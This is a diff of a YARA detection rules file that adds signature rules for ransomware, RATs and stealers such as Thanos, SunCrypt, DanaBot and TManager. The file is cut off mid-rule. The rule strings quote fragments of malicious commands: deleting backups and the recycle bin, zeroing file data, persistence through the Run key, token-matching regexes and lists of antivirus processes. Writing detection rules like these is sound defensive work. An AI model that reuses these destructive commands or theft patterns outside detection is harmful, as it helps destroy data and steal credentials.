-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6580-L6591"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4305-L4316"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b2224f8107e7c50334c7e12963e4e37c0a6824c49842afb314c12d6de9d6bc5e"
+		logic_hash = "1ed9206f90052df7e533be4612afa373e5e69fba8f5b5ae4df1c09a9d98958cf"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5dcbc94a2fdcc151afa8c55f24d0d5124d3b6134"
-		importance = 20
+
+	strings:
+		$s1 = "\\\\.\\PhysicalDrive" ascii
+		$s2 = "/logger.php" ascii
+		$s3 = "Ooops! Your MBR was been rewritten" ascii
+		$s4 = "No, this ransomware dont encrypt your files, erases it" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2021945 Ontario Inc." and pe.signatures [ i ] . serial == "28:b6:91:27:27:19:b1:ee" )
+		uint16( 0 ) == 0x5a4d and ( 2 of them and #s1 > 10 )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00E3B80C0932B52A708477939B0D32186F : FILE
+rule DITEKSHEN_MALWARE_Win_Lcpdot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects LCPDot"
 		author = "ditekSHen"
-		id = "41525cdd-f65a-5aad-bd99-1cdcf8b11981"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e4db3784-7fb0-58bd-997e-788f409445cd"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6593-L6607"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4318-L4337"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a0a95c20c5c82b460ddef686731d1053181cb5066bbb4f585a4f402f50efe030"
+		logic_hash = "b0f77f17976c38a69c2ff0d84002f2db29a4d25873309259519115b5f2b210ff"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1d2b5d4f0de1d7ce4abf82fdc58adc43bc28adee"
-		importance = 20
+
+	strings:
+		$s1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword wide
+		$s2 = "Cookie: SESSID=%s" fullword ascii
+		$s3 = "Cookie=Enable" fullword ascii
+		$s4 = "Cookie=Enable&CookieV=%d&Cookie_Time=32" fullword ascii
+		$s5 = ".?AVTShellCodeRuner@@" fullword ascii
+		$s6 = ".?AVTHashEncDecoder@@" fullword ascii
+		$s7 = ".?AVTWebAddressList@@" fullword ascii
+		$s8 = "WinMain.dll" fullword ascii
+		$s9 = "HotPlugin" wide
+		$o0 = { 4c 89 6c 24 08 4c 89 34 24 44 8d 77 01 44 8d 6f }
+		$o1 = { 8b f0 e8 58 34 00 00 48 8b f8 48 85 c0 74 0c 48 }
+		$o2 = { c7 44 24 30 47 49 46 38 c7 44 24 34 39 61 27 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BISOYETUTU LTD LIMITED" and ( pe.signatures [ i ] . serial == "e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" or pe.signatures [ i ] . serial == "00:e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" ) )
+		uint16( 0 ) == 0x5a4d and 6 of ( $s* ) or ( all of ( $o* ) and 3 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00C667Ffe3A5B0A5Ae7Cf3A9E41682E91B : FILE
+rule DITEKSHEN_MALWARE_Win_Torisma : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Torisma"
 		author = "ditekSHen"
-		id = "509dcc22-1202-5b6e-a602-6b06c282b28d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e62a0f1c-4404-5da1-9c43-4cb58e735827"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6609-L6623"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4339-L4355"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6d3d0cfb42758f917b003f7979f7123c1789c9e9b4e01b1aebf265a298eac08f"
+		logic_hash = "bd3823f8a91fdfc443e20bcb299a5103b7176a694f0d5328e7986de83f677a31"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6b66ba34ff01e0dab6e68ba244d991578a69c4ad"
-		importance = 20
+
+	strings:
+		$s1 = "ACTION=PREVPAGE&CODE=C%s&RES=%d" fullword ascii
+		$s2 = "ACTION=VIEW&PAGE=%s&CODE=%s&CACHE=%s&REQUEST=%d" fullword ascii
+		$s3 = "ACTION=NEXTPAGE&CODE=S%s&CACHE=%s&RES=%d" fullword ascii
+		$s4 = "Your request has been accepted. ClientID: {" ascii
+		$s5 = "Proxy-Connection: Keep-Alive" fullword wide
+		$s6 = "Content-Length: %d" fullword wide
+		$o0 = { f7 f9 8b c2 89 44 24 34 48 63 44 24 34 48 8b 4c }
+		$o1 = { 48 c7 00 ff ff ff ff 48 8b 84 24 90 }
+		$o2 = { f3 aa 83 7c 24 30 01 75 34 c7 44 24 20 01 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NAILS UNLIMITED LIMITED" and ( pe.signatures [ i ] . serial == "c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" or pe.signatures [ i ] . serial == "00:c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" ) )
+		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) or ( all of ( $o* ) and 3 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Sagsanlgs : FILE
+rule DITEKSHEN_MALWARE_Win_Thanos : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Thanos / Prometheus / Spook ransomware"
 		author = "ditekSHen"
-		id = "b08e46a5-de76-5711-98dc-2144c7bbe66f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "f523906e-ef5e-57be-82ed-06e75c393f42"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6639-L6650"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4357-L4389"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3ab10d8605f501f3c4f3a3afa31c5b001e03354846ff1953e7e36ceb9b564bf6"
+		logic_hash = "8ce7cdfe4bca31e21d6fa31a75c46737a41fae3b5b0fda818e3a4709ceaf9bf5"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "a6073f35adbdfe26ddc0f647953acc3a9bd33962"
-		importance = 20
+
+	strings:
+		$f1 = "<WorkerCrypter2>b__" ascii
+		$f2 = "<Encrypt2>b__" ascii
+		$f3 = "<Killproc>b__" ascii
+		$f4 = "<GetIPInfo>b__" ascii
+		$f5 = "<MacAddress>k__" ascii
+		$f6 = "<IPAddress>k__" ascii
+		$f7 = "<Crypt>b__" ascii
+		$s1 = "Aditional KeyId:" wide
+		$s2 = "process call create cmd.exe /c \\\\" wide
+		$s3 = "/c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin" wide
+		$s4 = "\\HOW_TO_DECYPHER_FILES." wide
+		$s5 = "Client Unique Identifier Key:" wide
+		$s6 = "/s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c:\\*.dsk" fullword wide
+		$s7 = "NtOpenProcess" fullword wide
+		$s8 = "Builder_Log" fullword wide
+		$s9 = "> Nul & fsutil file setZeroData offset=0 length=" wide
+		$s10 = "3747bdbf-0ef0-42d8-9234-70d68801f407" wide
+		$s11 = "4b195894-0f06-4fdd-afb4-b17fb9246a59" wide
+		$s12 = "cec564ff-2433-4771-b918-15f58ef6e26c" wide
+		$s13 = "56258a19-7489-468b-86ee-e7899203d67c" wide
+		$s14 = "WalkDirectoryTree" fullword ascii
+		$s15 = "hashtableLock" fullword ascii
+		$s16 = "get_ParentFrn" fullword ascii
+		$m1 = "SW5mb3JtYXRpb24uLi" wide
+		$m2 = "QWxsIHlvdXIgZmlsZXMgd2VyZSBlbmNyeXB0" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sagsanlgs" and pe.signatures [ i ] . serial == "00" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $f* ) or 5 of ( $s* ) or ( 4 of ( $f* ) and 2 of ( $s* ) or ( all of ( $m* ) and 3 of them ) ) or 8 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00989A33B72A2Aa29E32D0A5E155C53963 : FILE
+rule DITEKSHEN_MALWARE_Win_Tmanager : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects TManager RAT. Associated with TA428"
 		author = "ditekSHen"
-		id = "59fcdc74-ca44-5d30-b9b0-5e9c7a3b50f3"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "391b72bd-ddf5-5251-b566-c75c1cc16b74"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6668-L6682"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4391-L4410"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f016093cd512bcbf31814ff1619441e476b3988d0670f469f6311eda37ae295d"
+		logic_hash = "cdbcc00ae67c9161f6db89cfa658c8bc8fb7fab3915ac5ae99bdd34c42ee2abb"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "3f53d410d2d959197f4a93d81a898f424941e11f"
-		importance = 20
+
+	strings:
+		$s1 = "WSAStartup Error!" fullword wide
+		$s2 = "KB3112342.LOG" fullword wide
+		$s3 = "\\cmd.exe -c" fullword wide
+		$s4 = "sock_hmutex" fullword wide
+		$s5 = "cmd_hmutex" fullword wide
+		$s6 = "powershell" fullword wide
+		$s7 = "%s_%d.bmp" fullword wide
+		$s8 = "!Error!" fullword wide
+		$s9 = "[Execute]" fullword ascii
+		$s10 = "[Snapshot]" fullword ascii
+		$s11 = "GetLanIP error!" fullword ascii
+		$s12 = "chcp & exit" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TAKE CARE SP Z O O" and ( pe.signatures [ i ] . serial == "98:9a:33:b7:2a:2a:a2:9e:32:d0:a5:e1:55:c5:39:63" or pe.signatures [ i ] . serial == "00:98:9a:33:b7:2a:2a:a2:9e:32:d0:a5:e1:55:c5:39:63" ) )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00B8F726508Cf1D7B7913Bf4Bbd1E5C19C : FILE
+rule DITEKSHEN_MALWARE_Win_Sn0Wlogger : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Sn0w Logger"
 		author = "ditekSHen"
-		id = "0acaaed9-ba18-56b0-95b9-e05181843129"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "cdb70164-3f72-553f-a6c5-190f699e0743"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6684-L6698"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4412-L4428"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "71eb50a47465d69dbdd488c57b3fd9f70a4dd3b0bc086ed14038320928bc947e"
+		logic_hash = "ea4b2281f906271dc249b5036b22eadfc5add94def4f8e4f8a40c384618465d8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0711adcedb225b82dc32c1435ff32d0a1e54911a"
-		importance = 20
+
+	strings:
+		$s1 = "\\SnowP\\Example\\Secured\\" ascii
+		$s2 = "{0}{3}Content-Type: {4}{3}Content-Disposition: form-data; name=\"{1}\"{3}{3}{2}{3}" wide
+		$s3 = "\"encrypted_key\":\"(.*?)\"" fullword wide
+		$s4 = "<SendToDiscord>d__" ascii
+		$s5 = "_urlWebhook" ascii
+		$r1 = "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}" fullword wide
+		$r2 = "^\\w+([-+.']\\w+)*@\\w+([-.]\\w+)*\\.\\w+([-.]\\w+)*$" fullword wide
+		$r3 = "mfa\\.[\\w-]{84}" fullword wide
+		$r4 = "(\\w+)=(\\d+)-(\\d+)$" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TMerkuri LLC" and ( pe.signatures [ i ] . serial == "b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" or pe.signatures [ i ] . serial == "00:b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" ) )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( all of ( $r* ) and 2 of ( $s* ) ) or 7 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Aa099E64E214D655801Ea38Ad876711 : FILE
+rule DITEKSHEN_MALWARE_Win_Danabot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects DanaBot variants"
 		author = "ditekSHen"
-		id = "00b9cd1f-e389-51fd-8a08-73334bb0d0ef"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "a49e21b9-d40a-5273-a9a2-322a1ec9bbbc"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6700-L6712"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4430-L4459"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a4211bc2f3cedb8b135566d4b22251523a3a2bbdb04c1f1c5b1336ae7c198773"
+		logic_hash = "8d037b46d719159dc3e60f0c7143022ce8745cfd753c3754ae80a220a838567d"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "0789b35fd5c2ef8142e6aae3b58fff14e4f13136"
-		hash1 = "9f90e6711618a1eab9147f90bdedd606fd975b785915ae37e50e7d2538682579"
-		importance = 20
+
+	strings:
+		$s1 = "ms ie ftp passwords" fullword wide
+		$s2 = "CookieEntryEx_" fullword wide
+		$s3 = "winmgmts:\\\\localhost\\root\\cimv2" fullword wide
+		$s4 = "S-Password.txt" fullword wide
+		$s5 = "del_ini://Main|Password|" fullword wide
+		$s6 = "cmd.exe /c start chrome.exe --no-sandbox" wide
+		$s7 = "cmd.exe /c start firefox.exe -no-remote" wide
+		$s8 = "\\rundll32.exe shell32.dll,#" wide
+		$s9 = "S_Error:TORConnect" wide
+		$s10 = "InjectionProcess" fullword ascii
+		$s11 = "proxylogin" fullword wide
+		$s12 = "\\FS_Morff\\FS_Temp\\" wide
+		$ds1 = "C:\\Windows\\System32\\rundll32.exe" fullword wide
+		$ds2 = "PExtended4" fullword ascii
+		$ds3 = "%s-%s" fullword wide
+		$ds4 = "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F808182838485868788898A8B8C8D8E8F909192939495969798999A9B9C9D9E9FA0A1A2A3A4A5A6A7A8A9AAABACADAEAFB0B1B2B3B4B5B6B7B8B9BABBBCBDBEBFC0C1C2C3C4C5C6C7C8C9CACBCCCDCECFD0D1D2D3D4D5D6D7D8D9DADBDCDDDEDFE0E1E2E3E4E5E6E7E8E9EAEBECEDEEEFF0F1F2F3F4F5F6F7F8F9FAFBFCFDFEFF0123456789ABCDEF" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Psiphon Inc." and pe.signatures [ i ] . serial == "0a:a0:99:e6:4e:21:4d:65:58:01:ea:38:ad:87:67:11" )
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or all of ( $ds* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_54Cc50D147Fa549E3F721C754E4E3A91 : FILE
+rule DITEKSHEN_MALWARE_Win_Klackring : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Klackring variants. Associated with ZINC / Lazarus"
 		author = "ditekSHen"
-		id = "2007dabd-74c0-5cc7-986c-21fb1df9136a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "7bd9a68f-d58b-5437-a28b-5a7f1a11038e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6714-L6726"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4461-L4475"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "367237a9370542a4506fb13683f0a91e4bf5eb871e4b9f62b4cae8316bdf2d9a"
+		logic_hash = "b894e89de720affadd80966d726a44ffce75d71095b0530edb6bfddb76660c54"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e3143f0df21fced02fe5525b297ed4cd389c66e3"
-		hash1 = "85adf569d259dc53c5099fea6e90ff3a614a406b4308ebdf9f40e8bed151f526"
-		importance = 20
+
+	strings:
+		$s1 = "%s\\%s.dll" fullword wide
+		$s2 = "cmd.exe /c move /Y %s %s" fullword wide
+		$s3 = "%s\\win32k.sys" fullword wide
+		$s4 = "NetSvcInst_Rundll32.dll" fullword ascii
+		$s5 = "Spectrum.dll" fullword ascii wide
+		$s6 = "%s\\cmd.exe" fullword wide
+		$s7 = ".?AVA5Stream@@" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ralink Technology Corporation" and pe.signatures [ i ] . serial == "54:cc:50:d1:47:fa:54:9e:3f:72:1c:75:4e:4e:3a:91" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1E508Bb2398808Bc420A5A1F67Ba5D0B : FILE
+rule DITEKSHEN_MALWARE_Win_Comebacker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ComeBacker variants. Associated with ZINC / Lazarus"
 		author = "ditekSHen"
-		id = "32f79595-6526-5dea-824a-cc073b6a2b5c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d0454d09-4a15-5251-aa7a-cb00604715ca"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6728-L6740"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4477-L4492"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "71b7efab5359408e3897498ce031c8375e2d67bfc8ff15c685df5ac6dd4bb015"
+		logic_hash = "0d806fd199f0e8e3576ca837781c2fa06f1a09d75ea16602effb72754d8e4940"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "63a3ca4114aef8d5076ec84ff78d2319d5305e5b"
-		hash1 = "7ff82a6621e0dd7c29c2e6bcd63920f9b58bc254df9479618b912a1e788ff18b"
-		importance = 20
+
+	strings:
+		$s1 = "ENGINE_get_RAND" ascii
+		$s2 = "./{IES" fullword ascii
+		$s3 = "TODO: <Company name>" fullword wide
+		$s4 = "@Microsoft Corperation. All rights reserved." fullword wide
+		$s5 = "Microsoft@Windows@Operating System" fullword wide
+		$x1 = "C:\\Windows\\System32\\rundll32.exe %s,%s %s %s" fullword ascii wide
+		$x2 = "ASN2_TYPE_new" fullword ascii wide
+		$x3 = "SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WakeNet AB" and pe.signatures [ i ] . serial == "1e:50:8b:b2:39:88:08:bc:42:0a:5a:1f:67:ba:5d:0b" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $x* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_008B3333D32B2C2A1D33B41Ba5Db9D4D2D : FILE
+rule DITEKSHEN_MALWARE_Win_Suncrypt : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SunCrypt ransomware"
 		author = "ditekSHen"
-		id = "90947492-2f42-5d90-b635-62a5f7e79ffc"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "1a28fcbf-1fc0-5f18-ae71-2e813ed0f958"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6742-L6757"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4494-L4532"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c15a248dd52e7e888da381fda296cf19c53196ef52c4c4ce74af646d427eccde"
+		logic_hash = "abde9bbf2577304ff059972a38e803ba17de7a1f0346efe880a710f2ad79db37"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "7ecaa9a507a6672144a82d453413591067fc1d27"
-		hash1 = "5d5684ccef3ce3b6e92405f73794796e131d3cb1424d757828c3fb62f70f6227"
-		importance = 20
+
+	strings:
+		$s1 = "-noshares" fullword wide
+		$s2 = "-nomutex" fullword wide
+		$s3 = "-noreport" fullword wide
+		$s4 = "-noservices" fullword wide
+		$s5 = "$Recycle.bin" fullword wide
+		$s6 = "YOUR_FILES_ARE_ENCRYPTED.HTML" fullword wide
+		$s7 = "\\\\?\\%c:" fullword wide
+		$s8 = "locker.exe" fullword ascii
+		$s9 = "DllRegisterServer" fullword ascii
+		$g1 = "main.EncFile" fullword ascii nocase
+		$g2 = "main.detectName" fullword ascii nocase
+		$g3 = "main.detectIP" fullword ascii nocase
+		$g4 = "main.detectDebugProc" fullword ascii nocase
+		$g5 = "main.Bypass" ascii nocase
+		$g6 = "main.allocateMemory" fullword ascii nocase
+		$g7 = "main.killAV" fullword ascii nocase
+		$g8 = "main.disableShadowCopy" fullword ascii nocase
+		$g9 = "main.(*windowsDrivesModel).LoadDrives" fullword ascii nocase
+		$g10 = "main.IsFriends" fullword ascii nocase
+		$g11 = "main.walkMsg" fullword ascii nocase
+		$g12 = "main.makeSecretMessage" fullword ascii nocase
+		$g13 = "main.stealFiles" fullword ascii nocase
+		$g14 = "main.newKey" fullword ascii nocase
+		$g15 = "main.openBrowser" fullword ascii nocase
+		$g16 = "main.killProc" fullword ascii nocase
+		$g17 = "main.selfRemove" fullword ascii nocase
+		$m1 = "<h2>\\x20Offline\\x20HowTo\\x20</h2>\\x0a\\x09\\x09\\x09\\x09<p>Copy\\x20&\\x20Paste\\x20this\\x20message\\x20to" ascii
+		$m2 = "\\x20restore\\x20your\\x20files." ascii
+		$m3 = "\\x20your\\x20documents\\x20and\\x20files\\x20encrypted" ascii
+		$m4 = "\\x20lose\\x20all\\x20of\\x20your\\x20data\\x20and\\x20files." ascii
+		$m5 = ",'/#/client/','<h2>\\x20Whats\\x20Happen" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BOOK CAF\\xC3\\x89" and ( pe.signatures [ i ] . serial == "8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" or pe.signatures [ i ] . serial == "00:8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" ) )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or 6 of ( $g* ) or 3 of ( $m* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_B548765Eebe9468348Af40B9891C1E63 : FILE
+rule DITEKSHEN_MALWARE_Win_Zegost : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Zegost"
 		author = "ditekSHen"
-		id = "0ee1a31b-6324-5dbd-bd0d-765bc4891415"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "cce29602-c096-53df-a99b-16f18ed43b80"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6759-L6771"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4534-L4560"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "db8136f63657130bb3fe2527bb597e70bc3d46395aa3137810f4ee4b4de6c6ec"
+		logic_hash = "96727a0f5c113e5cdfe871f104553fd1c04a8f63ecbb8db7223afb71fcdd4087"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5987703bc4a3c739f92af8fed1747394880e1a39"
-		hash1 = "501dee454ba470aa09ceceb4c93ab7e9e913729e47fcc184a2e2d675f8234a58"
-		importance = 20
+
+	strings:
+		$s1 = "rtvscan.exe" fullword ascii
+		$s2 = "ashDisp.exe" fullword ascii
+		$s3 = "KvMonXP.exe" fullword ascii
+		$s4 = "egui.exe" fullword ascii
+		$s5 = "avcenter.exe" fullword ascii
+		$s6 = "K7TSecurity.exe" fullword ascii
+		$s7 = "TMBMSRV.exe" fullword ascii
+		$s8 = "RavMonD.exe" fullword ascii
+		$s9 = "kxetray.exe" fullword ascii
+		$s10 = "mssecess.exe" fullword ascii
+		$s11 = "QUHLPSVC.EXE" fullword ascii
+		$s12 = "360tray.exe" fullword ascii
+		$s13 = "QQPCRTP.exe" fullword ascii
+		$s14 = "knsdtray.exe" fullword ascii
+		$s15 = "V3Svc.exe" fullword ascii
+		$s16 = "??1_Winit@std@@QAE@XZ" fullword ascii
+		$s17 = "ClearEventLogA" fullword ascii
+		$s18 = "SeShutdownPrivilege" fullword ascii
+		$s19 = "%s\\shell\\open\\command" fullword ascii
 
 	condition:
